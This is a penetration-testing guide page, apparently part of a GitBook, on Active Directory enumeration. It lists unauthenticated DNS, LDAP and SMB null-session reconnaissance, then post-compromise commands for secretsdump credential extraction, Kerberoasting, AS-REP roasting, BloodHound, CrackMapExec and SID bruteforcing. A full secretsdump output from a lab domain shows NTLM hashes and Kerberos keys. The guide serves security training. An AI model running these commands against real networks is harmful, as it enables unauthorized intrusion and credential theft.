This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Active Directory Enumeration

Non-Authenticated (External) Enumeration

DNS Reconnaissance

Reverse DNS + PTR Records

We need this to identify hostnames that match DCs or other AD services, this method may not work if PTR records are not present in the DNS server.

dnsrecon -r <ip-range> -n <dc-ip or dns-server>

SRV Record Discovery

This type of discovery reveals what services are actually running in the domain, especially the DC server.

What is good about this is that it does not require you to be authenticated to the domain.

dnsrecon -d <domain> -t srv -n <dc-ip or dns-server>

Example output:

This table explains each chunk of the output:

Record Type
Example Value
Description

Service Name

_kerberos

The protocol/service being requested (e.g., Kerberos, LDAP, etc.).

Transport Protocol

_tcp / _udp

Transport protocol used by the service (usually TCP or UDP).

FQDN (Query Target)

hackme.local

The DNS zone/domain for which the SRV record was queried.

Hostname of Service Provider

win-r0buvkrgbid.hackme.local

The actual hostname providing the service (Domain Controller, for example).

IP Address of Hostname

192.168.100.154

The IP address of the hostname providing the service.

Service Port

88, 389, 464, 3268

Port on which the service is listening (e.g., 88 for Kerberos, 389 for LDAP).

LDAP Enumeration

LDAP Anonymous Binding

Purpose: Extract directory information when anonymous access is permitted.

Anonymous LDAP Queries

# Test anonymous binding capabilities
ldapsearch -x -H ldap://<DC-IP> -s base namingcontexts
ldapsearch -x -H ldap://<DC-IP> -s base defaultnamingcontext

# Extract base domain information
ldapsearch -x -H ldap://<DC-IP> -b "DC=domain,DC=com" "(objectClass=*)" -s base

# Anonymous user enumeration
ldapsearch -x -H ldap://<DC-IP> -b "DC=domain,DC=com" "(objectClass=user)" sAMAccountName description
ldapsearch -x -H ldap://<DC-IP> -b "DC=domain,DC=com" "(objectClass=person)" cn mail

# Anonymous group enumeration
ldapsearch -x -H ldap://<DC-IP> -b "DC=domain,DC=com" "(objectClass=group)" sAMAccountName member

Requirements: LDAP server configured to allow anonymous binds

Use Case: Legacy environments, misconfigured LDAP servers, or intentionally open directories

Automated Anonymous LDAP Extraction

# Complete anonymous domain dump
ldapdomaindump -u '' -p '' <DC-IP>

# Alternative anonymous enumeration
enum4linux -a <DC-IP>

Requirements: Anonymous LDAP access enabled

Use Case: When organizations maintain legacy compatibility or have misconfigured LDAP security

SMB/NetBIOS Enumeration

Purpose: Leverage SMB null sessions and NetBIOS for domain reconnaissance.

SMB Null Session Enumeration

# Basic SMB enumeration
smbclient -L //<DC-IP> -N
smbmap -H <DC-IP> -u '' -p ''

# RPC null session exploitation
rpcclient -U "" -N <DC-IP>
rpcclient> enumdomusers
rpcclient> enumdomgroups
rpcclient> querydominfo
rpcclient> querydispinfo
rpcclient> enumdomains

Requirements: SMB server allows null sessions (RestrictAnonymous = 0)

Use Case: Windows 2000/2003 environments or systems with legacy compatibility settings

NetBIOS Information Gathering

# NetBIOS name resolution
nbtscan 192.168.1.0/24
nmblookup -A <target-IP>

# NetBIOS enumeration
enum4linux -n <DC-IP>
nmap -sU -p 137 --script nbstat <network-range>

Requirements: NetBIOS over TCP/IP enabled

Use Case: Internal network enumeration, legacy Windows environments

Authenticated (Post-Compromise) Enumeration

Domain Mapping

Purpose: Extract AD objects and relationships for attack planning.

LDAP Domain Dump

Requirements: Valid domain credentials (user account)

Use Case: Post-credential compromise, domain mapping for attack planning

# Complete authenticated domain extraction
ldapdomaindump -u '<domain>\<username>' -p '<password>' <DC-IP>

# Alternative authentication method
ldapdomaindump --hashes :<NTLM-hash> -u '<username>' -d <domain.com> <DC-IP>

Credential Extraction

Purpose: Harvest authentication material for lateral movement and privilege escalation.

Requirements: Administrative privileges on target system or DCSync rights for domain controllers

Use Case: When you have admin access to systems or specific privileges like "Replicating Directory Changes"

NTDS.dit and Registry Hive Extraction

# Complete credential dump from domain controller
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP>
python3 secretsdump.py -hashes :<NTLM-hash> <domain>/<username>@<DC-IP>

Example output:

Impacket v0.13.0.dev0+20250728.93925.b5302a84 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xd01d352a7b37e42791250a0ec4c4baa3
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:837fe788c26c344499fe1925c93f1ede:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
HACKME\WIN-R0BUVKRGBID$:aes256-cts-hmac-sha1-96:c0ccd9f1abf0f8ba60d302f0ecb193ba3801e4c4247332a585a1674f7b867a4a
HACKME\WIN-R0BUVKRGBID$:aes128-cts-hmac-sha1-96:9f7c71c1118f61fa9114c5101424418b
HACKME\WIN-R0BUVKRGBID$:des-cbc-md5:0eba0273bad6cddc
HACKME\WIN-R0BUVKRGBID$:plain_password_hex:13e281e55dc8d980092c231b7fee2200cfded5eb024fa4d177ee6c1c0e428bee9ae2797e50cf651bdde3002cd487f660672ea5118c4409593e9c4b1b8e1256b14b2bf9be84a84bfc54b72a1aaa2fff6f90b20d5374f770f7b43e57964c7730ce154bcc291fb9a5da7f5aace24a64aa0a43499b6ab06cf71442b2be0e5ca68d50b647edb16736034e46efde3e5b2126613912c08068525f59778a2a531464347a56d2fa055bd9d1740f13a4522848f6d94d59721c0e7fae6a7e6597066b00cb52407f3555ebb9154a0415a30a377dbc2fdf4e22f5a7104aed183e71954339d61224cfa598935ae952cf3660eac4116d0f
HACKME\WIN-R0BUVKRGBID$:aad3b435b51404eeaad3b435b51404ee:53301a3a3669d99ddc0ecfaa7cf43e7a:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe5639817fd3ce0a5fc8d379c16f99fa6c830b85a
dpapi_userkey:0x5c8986c14d00d9457788fb334fc2a92d4d7acbc2
[*] NL$KM 
 0000   DD D5 F3 D0 EA 3E 3F 1B  34 70 72 E6 34 9B 62 78   .....>?.4pr.4.bx
 0010   CF 54 72 CA F4 86 45 A4  0A D0 DF 3F 2B 1E 2E E9   .Tr...E....?+...
 0020   33 65 9A 31 59 2A 57 27  7D 37 E7 ED 5C 6C 28 11   3e.1Y*W'}7..\l(.
 0030   24 92 C6 99 1B 0C 85 2F  70 9B 48 A2 8B 39 EA DF   $....../p.H..9..
NL$KM:ddd5f3d0ea3e3f1b347072e6349b6278cf5472caf48645a40ad0df3f2b1e2ee933659a31592a57277d37e7ed5c6c28112492c6991b0c852f709b48a28b39eadf
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:837fe788c26c344499fe1925c93f1ede:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:241ebf5d671f670e63a3a12fd332fd1a:::
hackme.local\sql-svc:1103:aad3b435b51404eeaad3b435b51404ee:837fe788c26c344499fe1925c93f1ede:::
hackme.local\7amoodeh:1104:aad3b435b51404eeaad3b435b51404ee:ba17e001e5467d85d16ae7247947929c:::
hackme.local\ra2fat:1105:aad3b435b51404eeaad3b435b51404ee:ba17e001e5467d85d16ae7247947929c:::
WIN-R0BUVKRGBID$:1000:aad3b435b51404eeaad3b435b51404ee:53301a3a3669d99ddc0ecfaa7cf43e7a:::
DESKTOP-4CJ1O3A$:1106:aad3b435b51404eeaad3b435b51404ee:fa92e5f8eb7ace3562e5711a869ffc59:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:eda01d9820ff8288900a83674eec768856d66f53ac19b244c9208376ebe5c484
Administrator:aes128-cts-hmac-sha1-96:48c2d624819f9c36281ff52aed35ce32
Administrator:des-cbc-md5:45838a9468a7d626
krbtgt:aes256-cts-hmac-sha1-96:2263f262b93c5c4969e7c1409ff6474a23bd3d1462a94a3b6cac52cd61e5a9d0
krbtgt:aes128-cts-hmac-sha1-96:c0dcf5e606ea8bb22f0608289ccab1bd
krbtgt:des-cbc-md5:9d6eb58fd9e6a208
hackme.local\sql-svc:aes256-cts-hmac-sha1-96:2c54eafc466fbd3f2d4d205b823b4784a00cb9e05d5922de9351c7b51fd198e9
hackme.local\sql-svc:aes128-cts-hmac-sha1-96:630dca436f714c2fe0522b226405fdc5
hackme.local\sql-svc:des-cbc-md5:5b9b342f459868c1
hackme.local\7amoodeh:aes256-cts-hmac-sha1-96:bab49f211d57e7fe609012db29f9f4b61f22bf5029716c888bd8ac7c8a527e6e
hackme.local\7amoodeh:aes128-cts-hmac-sha1-96:19318dc18b9d36107c346e339b7407d5
hackme.local\7amoodeh:des-cbc-md5:62c723379bfbaedc
hackme.local\ra2fat:aes256-cts-hmac-sha1-96:da91b33ef480372970d1260fb28adfba8a9e90a3aa7546bf16c8b8c86ae46554
hackme.local\ra2fat:aes128-cts-hmac-sha1-96:4bf2db5302b776eaa25e08af4debcbaf
hackme.local\ra2fat:des-cbc-md5:91fb8cf19ba8868f
WIN-R0BUVKRGBID$:aes256-cts-hmac-sha1-96:c0ccd9f1abf0f8ba60d302f0ecb193ba3801e4c4247332a585a1674f7b867a4a
WIN-R0BUVKRGBID$:aes128-cts-hmac-sha1-96:9f7c71c1118f61fa9114c5101424418b
WIN-R0BUVKRGBID$:des-cbc-md5:23465825ae6b383b
DESKTOP-4CJ1O3A$:aes256-cts-hmac-sha1-96:a558cfe8d560b89df823e1319a6f0554641f084e69ca4e82d742130fee58c4e9
DESKTOP-4CJ1O3A$:aes128-cts-hmac-sha1-96:1ecca604d68ae2a7478b1161d158daef
DESKTOP-4CJ1O3A$:des-cbc-md5:311adab07a326197
[*] Cleaning up...

Service Account Discovery

Purpose: Identify service accounts for Kerberoasting and AS-REP roasting attacks.

Kerberoasting Enumeration

Requirements: Valid domain user credentials (any user can perform Kerberoasting)

Use Case: Always applicable with domain credentials - service accounts are common targets

# SPN enumeration
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP>
python3 GetUserSPNs.py -hashes :<NTLM-hash> <domain>/<username> -dc-ip <DC-IP>

Example output:

AS-REP Roasting

Requirements: Domain user credentials or list of usernames for unauthenticated attempts

Use Case: When accounts have "Do not require Kerberos preauthentication" enabled

# Find accounts without pre-authentication
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP>
python3 GetNPUsers.py <domain>/ -usersfile users.txt -dc-ip <DC-IP> -no-pass

Privilege Escalation Path Discovery

Purpose: Map AD relationships for privilege escalation opportunities.

BloodHound Data Collection

For this, you need a specialized viewer (BloodHound) for the data and a graph database (Neo4j).

Installation details can be found in My preferred tools (Important!)

Requirements: Domain user credentials, network access to domain controllers and targets

Use Case: Mapping complex privilege relationships, planning privilege escalation paths

# Comprehensive collection
bloodhound-python -u <username> -p <password> -ns <DC-IP> -dc <FQDN> -d <domain.com> -c all
bloodhound-python -u <username> -p <password> -ns <DC-IP> -dc <FQDN> -d <domain.com> -c all --zip
bloodhound-python --hashes :<NTLM-hash> -u <username> -ns <DC-IP> -dc <FQDN> -d <domain.com> -c all

Multi-Protocol Information Gathering

Purpose: Leverage multiple protocols for comprehensive enumeration.

CrackMapExec Enumeration

# SMB-based enumeration
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --users
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --groups
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --shares
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --sessions
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --disks

# LDAP-based enumeration
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --users
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --groups
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --admin-count
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --trusted-for-delegation
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --password-not-required

# Advanced LDAP queries
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --kerberoasting
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --asreproast
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --gmsa

# Network-wide enumeration
crackmapexec smb 192.168.1.0/24 -u '<username>' -p '<password>' --shares
crackmapexec ldap 192.168.1.0/24 -u '<username>' -p '<password>' --users

Requirements: Valid domain credentials, network access to targets

Use Case: Network-wide enumeration, multi-protocol correlation, bulk operations

Password Policy and Account Lockout Analysis

# Extract password policies
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --pass-pol
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --pass-pol

# Fine-grained password policy enumeration
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --fgpp

Requirements: Domain user credentials

Use Case: Planning password attacks, understanding lockout thresholds

Security Identifier (SID) Analysis

Purpose: Enumerate objects through SID bruteforcing.

Comprehensive SID Enumeration

# Basic SID enumeration
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP>
python3 lookupsid.py guest@<DC-IP>

# Custom SID ranges
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> 500-2000
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> 1000-5000

# Maximum SID discovery
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> | tail -1

Requirements: Valid credentials or guest access, RPC access to domain controllers

Use Case: Discovering hidden accounts, service accounts, and non-standard objects

Advanced LDAP Enumeration

Purpose: Perform targeted queries for specific attack vectors.

Windapsearch Enumeration

# Basic enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password>

# Privileged user discovery
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --da
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --privileged-users

# Delegation enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --unconstrained-users
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --unconstrained-computers
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --constrained-users

# Computer enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --computers
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --dc

# Custom LDAP queries
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> \
  --custom "(&(objectClass=user)(servicePrincipalName=*))"
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> \
  --custom "(&(objectClass=computer)(operatingSystem=*Server*))"

Requirements: Domain user credentials, LDAP access to domain controllers

Use Case: Targeted enumeration for specific attack vectors, custom queries

Trust Relationship Analysis

Purpose: Map trust relationships for cross-domain attacks.

Trust Enumeration

# Basic trust discovery
python3 getTrusts.py <domain>/<username>:<password> -dc-ip <DC-IP>

# Cross-domain enumeration
for domain in $(cat trusted_domains.txt); do
    echo "Enumerating $domain"
    python3 GetADUsers.py $domain/<username>:<password> -all -dc-ip <DC-IP>
    python3 GetUserSPNs.py $domain/<username>:<password> -dc-ip <DC-IP>
done

# Trust-specific BloodHound collection
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c Trusts

Requirements: Domain user credentials, network access to trusted domains

Use Case: Multi-domain environments with established trust relationships

PreviousActive Directory OverviewNextAuthentication Attacks

Last updated

Was this helpful?